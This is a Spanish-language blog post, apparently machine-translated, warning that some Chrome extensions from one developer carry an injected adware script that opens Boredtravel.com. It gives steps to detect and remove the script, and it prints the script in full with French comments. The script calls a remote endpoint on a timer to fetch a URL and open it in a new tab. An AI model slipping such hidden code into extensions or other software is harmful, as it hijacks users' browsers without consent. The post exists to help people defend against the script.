Su navegador Chrome puede estar infectado con el adware Boredtravel.com

Un adware que abre ventanas emergentes a Boredtravel.com se ha deslizado en algunas extensiones de Chrome. Aquí se explica cómo detectar y eliminar este virus.

Identificar y eliminar el adware Boredtravel.com

Se ha insertado un script malicioso en la última actualización de varias extensiones de Chrome. Este script abre el sitio Boredtravel.com sin el conocimiento de los usuarios, a intervalos regulares de tiempo. Las extensiones infectadas por este script son Lyrics Fetcher y Remind Me, del útil desarrollador webwebtech.

Este adware no es peligroso, ya que solo abre una página publicitaria. Sin embargo, es inquietante dejar que ocurra esta dudosa práctica.

Identifica el adware

Para identificar el adware, simplemente analice el comportamiento de su navegador:

  • Cierre Google Chrome y reinícielo.
  • Espere 6 minutos después de abrir el navegador. Si su navegador está infectado, se abrirá una pestaña en la página boredtravel.com después de exactamente 6 minutos. Esto también ocurrirá cada 4 horas.

Eliminar adware

La eliminación es simple y rápida:

  • Verifique sus extensiones de Chrome: si una o más de las extensiones mencionadas anteriormente están instaladas, entonces su navegador probablemente esté infectado.
  • Para eliminar este adware, simplemente deshabilite o elimine las extensiones en cuestión.

Se han identificado casos para extensiones Letra de Fetcher y Recuérdame, pero pueden no ser los únicos. Es posible que el adware también esté presente en la extensión Modo bebé, una extensión del mismo desarrollador.

No está claro si el desarrollador de esta extensión agregó deliberadamente el script malicioso, o si fue realizado por un hacker. Como precaución, le recomendamos que deshabilite o elimine todas las extensiones de este desarrollador.

Las extensiones han sido reportadas a Google, sabremos más pronto. Si otras extensiones tienen la misma preocupación, no dude en hacérnoslo saber.

Reemplazar extensiones

Aquí hay algunas extensiones alternativas:

El trabajo de Boredtravel.com

El principio es simple, el desarrollador o un hacker ha agregado un script en las extensiones en cuestión. Este script, que se ejecuta en segundo plano, indica al navegador que abra una página publicitaria a intervalos regulares. El objetivo para el desarrollador o hacker es que la página de destino se abra varias veces. Esto permite aumentar el número de visitas del sitio Boredtravel.com y aumentar los ingresos relacionados.

Aquí está el código que se ha agregado en la extensión. Agregué comentarios verdes para que entiendas mejor

<script>


// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
  setTimeout(function () { 
    $.ajax({
      url: "https://demo7530752.mockable.io/url",
           /* cette URL génère un lien du type
                https://ourshort.com/?g/BNHzHJJ */
      async: false,
      dataType: 'json',
      success: function (data) {

   //ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
        var newURL = data.msg;
        chrome.tabs.create({ url: newURL }); ;
        intervalWebsite() /* appel de la fonction qui ouvre
                           un pop-up toutes les 4 heures */
      }
    });
  }, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min


// fonction qui ouvre un pop-up toutes les 4 heures
  function intervalWebsite() {
    setInterval(function () {
      $.ajax({
        url: "https://demo7530752.mockable.io/url",
             // comme dans la première fonction
        async: false,
        dataType: 'json',
        success: function (data) {

          // comme dans la première fonction
          var newURL = data.msg;
          chrome.tabs.create({ url: newURL }); ;

        }
      });
    }, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
  }


</script>

Fuentes: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/

Lea también: Habilite la autenticación dual en sus cuentas en línea (2FA) https://currenttrends.fr/internet/2fa-double-authentification/

Sobre el Autor

Romain
Romain
Estoy muy interesado en tecnología, música, temas ambientales y varios otros temas. Al desarrollar el blog Current Trends, mi objetivo es compartir con ustedes mis conocimientos, mis descubrimientos y mis consejos sobre los diversos temas que me fascinan. Déjame comentarios, me ayuda a superarme y me hace feliz: D

20 € ofrecidos en sus productos orgánicos franceses

Obtenga 20 € de descuento en sus productos orgánicos franceses

¿Te gustó este contenido?

Ayúdanos a mejorar la calidad de nuestros artículos contándonos tus sugerencias

20 € ofrecidos en sus productos orgánicos franceses

Obtenga 20 € de descuento en sus productos orgánicos franceses

Ayúdenos

Apoyo
hoja informativa
Suscribirse
Notificar a
invitado

Este sitio utiliza Akismet para reducir el spam. Más información sobre cómo se utilizan los datos de sus comentarios.

2 Commentaires
Más votados
El más nuevo Más antiguo
Comentarios en línea
Ver todos los comentarios
Fernando Peña
Fernando Peña
Hace 8 meses

Tengo este problema pero no conozco ninguna de las extensiones que mencionaste.

Agregue tendencias actuales en sus aplicaciones

Crea un atajo
×